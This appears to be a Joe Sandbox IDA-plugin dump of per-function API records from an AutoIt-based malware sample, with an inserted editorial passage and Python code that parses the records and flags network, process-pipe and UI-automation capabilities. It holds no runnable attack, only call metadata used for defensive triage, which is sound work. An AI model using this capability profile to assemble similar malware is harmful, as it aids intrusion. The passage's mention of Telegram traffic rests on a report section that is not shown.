                                                                          • Instruction Fuzzy Hash: F8918C716043019FC715EF24C48499AB7F8EF89714F54896EF88A8B361DB31E945CB92
                                                                          APIs
                                                                            • Part of subcall function 0032FC86: _wcscpy.LIBCMT ref: 0032FCA9
                                                                          • _memset.LIBCMT ref: 00372B87
                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00372BB6
                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00372C69
                                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00372C97
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                          • String ID: 0
                                                                          • API String ID: 4152858687-4108050209
                                                                          • Opcode ID: fb47a4c4fcbc9c68366da13fde76891a340fec46a7dd7b82e43dc3e74bd3d9d8
                                                                          • Instruction ID: 8003773aa80ac5806120a36dac3107c2895e4e84afbf2e77b977474236abb4e8
                                                                          • Opcode Fuzzy Hash: fb47a4c4fcbc9c68366da13fde76891a340fec46a7dd7b82e43dc3e74bd3d9d8
                                                                          • Instruction Fuzzy Hash: CA51DF712083029FD7379F28D885A6FB7E8EF69310F058A2DF899D6291DB78CD448752
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove$_free
                                                                          • String ID: 3c2$_2
                                                                          • API String ID: 2620147621-3690450720
                                                                          • Opcode ID: 2203dbefd874008afd1fa9fdb34d333f1a0517031d6527a3a6586fe1704721cb
                                                                          • Instruction ID: 3400e2275f175802fa6fda7768afc94b71fcf0797639009297d2b567302d37c6
                                                                          • Opcode Fuzzy Hash: 2203dbefd874008afd1fa9fdb34d333f1a0517031d6527a3a6586fe1704721cb
                                                                          • Instruction Fuzzy Hash: 5E51AB71A083118FCB26DF29D491B6ABBE5BF85300F45486DE98987360DB35E901CB82
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _memset$_memmove
                                                                          • String ID: 3c2$ERCP
                                                                          • API String ID: 2532777613-3657493774
                                                                          • Opcode ID: b99310f0b645e88c36cd32dc14029328ffcc9222b290ab375dc0a10d1faabc1d
                                                                          • Instruction ID: ea166b3723d80d626ce6f9eff3e48d12a65d4c8d304338fb5946153ad6b2a5f8
                                                                          • Opcode Fuzzy Hash: b99310f0b645e88c36cd32dc14029328ffcc9222b290ab375dc0a10d1faabc1d
                                                                          • Instruction Fuzzy Hash: 5C51C371900715DBDB26CF65D886BABB7F8EF04304F21896EE54ADB290E770EA40CB40
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 003727C0
                                                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 003727DC
                                                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 00372822
                                                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,003D5890,00000000), ref: 0037286B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Delete$InfoItem_memset
                                                                          • String ID: 0
                                                                          • API String ID: 1173514356-4108050209
                                                                          • Opcode ID: 3ecc3c66b1d24963e4c5a4aa93cc04961ac4669ad08cec7b6f0188a0284c5856
                                                                          • Instruction ID: 726ca585bbd875910987b7f47e26174055700990d79ad6ff6d25e66eef3ece28
                                                                          • Opcode Fuzzy Hash: 3ecc3c66b1d24963e4c5a4aa93cc04961ac4669ad08cec7b6f0188a0284c5856
                                                                          • Instruction Fuzzy Hash: FF41C070204341AFD736DF25C844B1BBBE8EF85310F05892EF8A99B292D735A804CB53
                                                                          APIs
                                                                          • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0038D7C5
                                                                            • Part of subcall function 0031784B: _memmove.LIBCMT ref: 00317899
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharLower_memmove
                                                                          • String ID: cdecl$none$stdcall$winapi
                                                                          • API String ID: 3425801089-567219261
                                                                          • Opcode ID: 100108d03a803da896a417d4ec79e79d10daa5e53806fd3ea6e19c9846bfdba4
                                                                          • Instruction ID: aad63f04a93425d986b978fc351b594cbde3dffe2e46bba57aaaf9f226993a89
                                                                          • Opcode Fuzzy Hash: 100108d03a803da896a417d4ec79e79d10daa5e53806fd3ea6e19c9846bfdba4
                                                                          • Instruction Fuzzy Hash: D131AF71904719ABCF06EF54C895AEEB3B8FF04320F10866AE8259B6D1DB31AD05CB80
                                                                          APIs
                                                                            • Part of subcall function 00317DE1: _memmove.LIBCMT ref: 00317E22
                                                                            • Part of subcall function 0036AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0036AABC
                                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00368F14
                                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00368F27
                                                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00368F57
                                                                            • Part of subcall function 00317BCC: _memmove.LIBCMT ref: 00317C06
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$_memmove$ClassName
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 365058703-1403004172
                                                                          • Opcode ID: 6843746d87a10d48aba63f2c74c970859e8576a285d20d9a8aee31c77b12c062
                                                                          • Instruction ID: c55f09deb38198040899b66f867cd1edb124f37806164c9ee2e10bb5ff19c24e
                                                                          • Opcode Fuzzy Hash: 6843746d87a10d48aba63f2c74c970859e8576a285d20d9a8aee31c77b12c062
                                                                          • Instruction Fuzzy Hash: B321E471A04104BEDB1AABB0EC86DFFB77DDF49320F14861AF821AB1E1DF3548599A10
                                                                          APIs
                                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0038184C
                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00381872
                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003818A2
                                                                          • InternetCloseHandle.WININET(00000000), ref: 003818E9
                                                                            • Part of subcall function 00382483: GetLastError.KERNEL32(?,?,00381817,00000000,00000000,00000001), ref: 00382498
                                                                            • Part of subcall function 00382483: SetEvent.KERNEL32(?,?,00381817,00000000,00000000,00000001), ref: 003824AD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                          • String ID:
                                                                          • API String ID: 3113390036-3916222277
                                                                          • Opcode ID: 4d38c58d79d0b46fa2a4554b566d0a97bd7aa1b8fa05fab81b13be44cc6999ad
                                                                          • Instruction ID: 969c6583ef11b2ebe1cbaa6b522809b152a8aef35315c6056fad1cc9ae501118
                                                                          • Opcode Fuzzy Hash: 4d38c58d79d0b46fa2a4554b566d0a97bd7aa1b8fa05fab81b13be44cc6999ad
                                                                          • Instruction Fuzzy Hash: 692180B1500308BFEB12AB65DC86EBB77EDEB48744F10416AF805D7140DB719D0657B1
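The entries in this listing are per-function records of the embedded AutoIt runtime (the AUTOIT.ERROR, "Incorrect Parameter format" and cdecl/stdcall/winapi strings are the interpreter's own error and DllCall vocabulary), so what an analyst wants from them is a quick answer to "which of these hundreds of functions give the script a capability I care about". The Python below is an added example, not Joe Sandbox or IDA-plugin code: it parses the bullet layout used above into one record per function (direct calls, subcalls, String ID, Opcode ID) and flags the capability classes present in this section. The SAMPLE is an excerpt of three entries copied from the listing; the CAPABILITIES grouping is the editor's own and not a Joe Sandbox classification.

```python
"""Parse Joe Sandbox per-function API listings and flag capability classes.
Added example, not Joe Sandbox or IDA-plugin code."""
import re

# Excerpt of three entries copied from the listing above, trimmed to the
# lines the parser uses (unknown headers such as "Strings" are skipped).
SAMPLE = """\
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0038184C
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00381872
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003818A2
• InternetCloseHandle.WININET(00000000), ref: 003818E9
  • Part of subcall function 00382483: GetLastError.KERNEL32(?,?,00381817,00000000,00000000,00000001), ref: 00382498
  • Part of subcall function 00382483: SetEvent.KERNEL32(?,?,00381817,00000000,00000000,00000001), ref: 003824AD
Strings
Similarity
• API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
• String ID:
• Opcode ID: 4d38c58d79d0b46fa2a4554b566d0a97bd7aa1b8fa05fab81b13be44cc6999ad
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 00376DBC
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00376DEF
• GetStdHandle.KERNEL32(0000000C), ref: 00376E01
• CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00376E3B
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• Opcode ID: d33c3f3343ef3ae665e11a5b86b1141013a41dd76311d53169b331d8cebcc1bc
APIs
  • Part of subcall function 0032FC86: _wcscpy.LIBCMT ref: 0032FCA9
• _memset.LIBCMT ref: 00372B87
• GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00372BB6
• SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00372C69
• SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00372C97
Similarity
• API ID: ItemMenu$Info$Default_memset_wcscpy
• String ID: 0
• Opcode ID: fb47a4c4fcbc9c68366da13fde76891a340fec46a7dd7b82e43dc3e74bd3d9d8
"""

# "• Name.MODULE(args), ref: ADDR"; the argument list and comma are absent for
# CRT calls such as "_memset.LIBCMT ref: 00372B87". Subcall lines name the callee.
API_RE = re.compile(
    r"^• (?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,? ?ref: (?P<ref>[0-9A-F]+)$")
FIELD_RE = re.compile(r"^• (?P<key>[^:]+):\s*(?P<val>.*)$")


def parse_listing(text):
    """One record per function; a new record starts at every 'APIs' header."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"apis": [], "subcall_apis": [], "strings": [], "fields": {}}
            records.append(cur)
        elif cur is not None and line.startswith("•"):
            m = API_RE.match(line)
            if m:
                call = {"name": m["name"], "module": m["module"],
                        "args": m["args"].split(",") if m["args"] else [],
                        "ref": int(m["ref"], 16)}
                (cur["subcall_apis"] if m["sub"] else cur["apis"]).append(call)
                continue
            m = FIELD_RE.match(line)
            if m and m["key"].strip() == "String ID":   # "$"-joined string list
                cur["strings"] = [s for s in m["val"].strip().split("$") if s]
            elif m:
                cur["fields"][m["key"].strip()] = m["val"].strip()
    return records


# Editor's grouping of the APIs seen in this section, not a Joe Sandbox label.
CAPABILITIES = {
    "network": {"InternetOpenUrlW", "HttpSendRequestW", "HttpQueryInfoW", "InternetCloseHandle"},
    "child_process_io": {"CreatePipe", "GetStdHandle"},
    "ui_automation": {"SendMessageW", "GetMenuItemInfoW", "SetMenuItemInfoW",
                      "DeleteMenu", "SetMenuDefaultItem"},
}


def classify(record, include_subcalls=False):
    """Capability classes hit by a function's direct calls (optionally its subcalls)."""
    calls = record["apis"] + (record["subcall_apis"] if include_subcalls else [])
    names = {c["name"] for c in calls}
    hits = {cap for cap, known in CAPABILITIES.items() if names & known}
    if any(c["module"] == "WININET" for c in calls):   # any WinINet use is network
        hits.add("network")
    return sorted(hits)


def triage(records):
    """Summary rows: network-capable functions first, then by lowest call site."""
    rows = [{"opcode_id": r["fields"].get("Opcode ID", "")[:16],
             "lowest_ref": min((c["ref"] for c in r["apis"]), default=0),
             "capabilities": classify(r), "strings": r["strings"]} for r in records]
    rows.sort(key=lambda row: ("network" not in row["capabilities"], row["lowest_ref"]))
    return rows


if __name__ == "__main__":
    for row in triage(parse_listing(SAMPLE)):
        print(f"{row['opcode_id']}  {row['lowest_ref']:08X}  {row['capabilities']}  {row['strings']}")
```

Two caveats when reading the result. First, the 00000005 passed to HttpQueryInfoW is HTTP_QUERY_CONTENT_LENGTH, so the WinINet routine sizes a download before reading it, which is the shape of the AutoIt runtime's download primitive rather than payload-specific code; the fact that the interpreter carries a downloader says the script could use it, not that this sample did (the network behaviour actually observed for this sample is the Telegram API traffic flagged in the report header). Second, the listing only shows call sites inside a function (the ref: addresses); the parser takes the lowest direct call site as a locality hint, not as the function's entry point, which the listing does not state.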
                                                                          APIs
                                                                            • Part of subcall function 00311D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00311D73
                                                                            • Part of subcall function 00311D35: GetStockObject.GDI32(00000011), ref: 00311D87
                                                                            • Part of subcall function 00311D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00311D91
                                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00396461
                                                                          • LoadLibraryW.KERNEL32(?), ref: 00396468
                                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0039647D
                                                                          • DestroyWindow.USER32(?), ref: 00396485
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                          • String ID: SysAnimate32
                                                                          • API String ID: 4146253029-1011021900
                                                                          • Opcode ID: a55dd0ca2c601f75e223aa91b23755ef0813b06cd833d0876aed76577f8f6dfe
                                                                          • Instruction ID: e3d65047198bbc1943dc811169ba570d80b11e192c45eba04dd337b2d5044979
                                                                          • Opcode Fuzzy Hash: a55dd0ca2c601f75e223aa91b23755ef0813b06cd833d0876aed76577f8f6dfe
                                                                          • Instruction Fuzzy Hash: F5219D71201205BFEF124FA5DC82EBB37ADEB58724F114629FA10D60A0D771DC519760
                                                                          APIs
                                                                          • GetStdHandle.KERNEL32(0000000C), ref: 00376DBC
                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00376DEF
                                                                          • GetStdHandle.KERNEL32(0000000C), ref: 00376E01
                                                                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00376E3B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CreateHandle$FilePipe
                                                                          • String ID: nul
                                                                          • API String ID: 4209266947-2873401336
                                                                          • Opcode ID: d33c3f3343ef3ae665e11a5b86b1141013a41dd76311d53169b331d8cebcc1bc
                                                                          • Instruction ID: 5930a97893891932d8758c66d033365935557d8bba565d41be31b4665a30a210
                                                                          • Opcode Fuzzy Hash: d33c3f3343ef3ae665e11a5b86b1141013a41dd76311d53169b331d8cebcc1bc
                                                                          • Instruction Fuzzy Hash: A421C774600609AFDB329F29DC16B997BF8EF44720F208A1AFCA5D72D0D7759950CB50
                                                                          APIs
                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00376E89
                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00376EBB
                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00376ECC
                                                                          • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00376F06
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CreateHandle$FilePipe
                                                                          • String ID: nul
                                                                          • API String ID: 4209266947-2873401336
                                                                          • Opcode ID: ec3f4157a8fa3b1b0d3e85c46c3fbe6967f9d71a378efbdebdfadbf218546671
                                                                          • Instruction ID: 8e407e06f5e39e0a78e4fcfc2f688426ef23816ba30f1bd88537971fed743fe7
                                                                          • Opcode Fuzzy Hash: ec3f4157a8fa3b1b0d3e85c46c3fbe6967f9d71a378efbdebdfadbf218546671
                                                                          • Instruction Fuzzy Hash: 8D21C4795007059FDB329F69CD16A9A77E8EF44720F208A1AFCE4D72D0D775A840C761
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0037AC54
                                                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0037ACA8
                                                                          • __swprintf.LIBCMT ref: 0037ACC1
                                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,0039F910), ref: 0037ACFF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$InformationVolume__swprintf
                                                                          • String ID: %lu
                                                                          • API String ID: 3164766367-685833217
                                                                          • Opcode ID: da38324d1594b02ff583b07cf13c1bc666dc8484cb1ed1697e730574911a8a74
                                                                          • Instruction ID: da6f3ea248e7e75700981a9f83d180d9012a629762da8f8b4ca30b3565e13847
                                                                          • Opcode Fuzzy Hash: da38324d1594b02ff583b07cf13c1bc666dc8484cb1ed1697e730574911a8a74
                                                                          • Instruction Fuzzy Hash: 74217131A00109EFCB11EF64C985EEE7BBCEF89314B108069F909EB251DB31EA41CB61
                                                                          APIs
                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0036FCED,?,00370D40,?,00008000), ref: 0037115F
                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0036FCED,?,00370D40,?,00008000), ref: 00371184
                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0036FCED,?,00370D40,?,00008000), ref: 0037118E
                                                                          • Sleep.KERNEL32(?,?,?,?,?,?,?,0036FCED,?,00370D40,?,00008000), ref: 003711C1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CounterPerformanceQuerySleep
                                                                          • String ID: @7
                                                                          • API String ID: 2875609808-2194182032
                                                                          • Opcode ID: 50f5a1c9766c70be2e4843b399feb19c75f36e83254a9ee32907a85208afec8f
                                                                          • Instruction ID: 83e9ecf4f3920d8b9074923d5220b11948035f8f24ce30273df0585a3368b63d
                                                                          • Opcode Fuzzy Hash: 50f5a1c9766c70be2e4843b399feb19c75f36e83254a9ee32907a85208afec8f
                                                                          • Instruction Fuzzy Hash: 41113C32D0051DDBCF129FA9D889AEEBBBCFF09711F418056EA49BA240CB749550CBD5
                                                                          APIs
                                                                          • CharUpperBuffW.USER32(?,?), ref: 00371B19
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharUpper
                                                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                          • API String ID: 3964851224-769500911
                                                                          • Opcode ID: 7564903faee4b5ee8bbb14aae1e9bfc773f605e3afdf82babd48088672f21607
                                                                          • Instruction ID: d78b16d5ad144d8144c829458755e1fa196b2fa3042d73f55c9f18b7e6034a8c
                                                                          • Opcode Fuzzy Hash: 7564903faee4b5ee8bbb14aae1e9bfc773f605e3afdf82babd48088672f21607
                                                                          • Instruction Fuzzy Hash: E51188359102088FCF06EF58D8519FEB7B4FF66304F148469D8159B651EB325D06CB54
                                                                          APIs
                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0038EC07
                                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0038EC37
                                                                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0038ED6A
                                                                          • CloseHandle.KERNEL32(?), ref: 0038EDEB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
